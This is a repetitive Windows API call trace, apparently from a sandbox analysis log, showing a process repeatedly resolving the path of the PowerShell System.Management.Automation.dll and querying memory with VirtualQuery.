	[0161.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.755] GetLastError () returned 0x0
	[0161.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.755] GetLastError () returned 0x0
	[0161.756] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x69bf5493, Data2=0x5729, Data3=0x4856, Data4=([0]=0xb2, [1]=0x7, [2]=0xb2, [3]=0xc3, [4]=0x3d, [5]=0xc, [6]=0xe, [7]=0xd6))) returned 0x0
	[0161.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.756] GetLastError () returned 0x0
	[0161.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.756] GetLastError () returned 0x0
	[0161.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.756] GetLastError () returned 0x0
	[0161.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.756] GetLastError () returned 0x0
	[0161.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.756] GetLastError () returned 0x0
	[0161.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.756] GetLastError () returned 0x0
	[0161.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.757] GetLastError () returned 0x0
	[0161.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.757] GetLastError () returned 0x0
	[0161.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.757] GetLastError () returned 0x0
	[0161.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.767] GetLastError () returned 0x0
	[0161.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.767] GetLastError () returned 0x0
	[0161.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.767] GetLastError () returned 0x0
	[0161.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.767] GetLastError () returned 0x0
	[0161.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.767] GetLastError () returned 0x0
	[0161.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.767] GetLastError () returned 0x0
	[0161.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.768] GetLastError () returned 0x0
	[0161.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.768] GetLastError () returned 0x0
	[0161.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.768] GetLastError () returned 0x0
	[0161.769] VirtualQuery (in: lpAddress=0xcd2f4, lpBuffer=0xce2f4, dwLength=0x1c | out: lpBuffer=0xce2f4*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.770] VirtualQuery (in: lpAddress=0xcd330, lpBuffer=0xce330, dwLength=0x1c | out: lpBuffer=0xce330*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.770] GetLastError () returned 0x0
	[0161.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.771] GetLastError () returned 0x0
	[0161.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.771] GetLastError () returned 0x0
	[0161.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.771] GetLastError () returned 0x0
	[0161.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.771] GetLastError () returned 0x0
	[0161.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.771] GetLastError () returned 0x0
	[0161.771] VirtualQuery (in: lpAddress=0xcd660, lpBuffer=0xce660, dwLength=0x1c | out: lpBuffer=0xce660*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.772] GetLastError () returned 0x0
	[0161.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.772] GetLastError () returned 0x0
	[0161.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.772] GetLastError () returned 0x0
	[0161.772] VirtualQuery (in: lpAddress=0xcd660, lpBuffer=0xce660, dwLength=0x1c | out: lpBuffer=0xce660*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.773] GetLastError () returned 0x0
	[0161.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.773] GetLastError () returned 0x0
	[0161.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.773] GetLastError () returned 0x0
	[0161.773] VirtualQuery (in: lpAddress=0xcd660, lpBuffer=0xce660, dwLength=0x1c | out: lpBuffer=0xce660*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.774] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.774] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.776] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.776] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.776] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.776] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.777] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.777] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.777] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.777] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.779] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.779] VirtualQuery (in: lpAddress=0xcd49c, lpBuffer=0xce49c, dwLength=0x1c | out: lpBuffer=0xce49c*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.780] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.781] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.781] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.781] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.781] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x7f48ab9b, Data2=0xa41d, Data3=0x4ce6, Data4=([0]=0x9f, [1]=0x8f, [2]=0x5d, [3]=0xe5, [4]=0xff, [5]=0x3c, [6]=0xcb, [7]=0x45))) returned 0x0
	[0161.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.782] GetLastError () returned 0x0
	[0161.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.782] GetLastError () returned 0x0
	[0161.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.782] GetLastError () returned 0x0
	[0161.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.782] GetLastError () returned 0x0
	[0161.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.782] GetLastError () returned 0x0
	[0161.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.782] GetLastError () returned 0x0
	[0161.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.782] GetLastError () returned 0x0
	[0161.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.782] GetLastError () returned 0x0
	[0161.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.782] GetLastError () returned 0x0
	[0161.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.783] GetLastError () returned 0x0
	[0161.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.783] GetLastError () returned 0x0
	[0161.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.783] GetLastError () returned 0x0
	[0161.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.783] GetLastError () returned 0x0
	[0161.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.783] GetLastError () returned 0x0
	[0161.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.783] GetLastError () returned 0x0
	[0161.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.783] GetLastError () returned 0x0
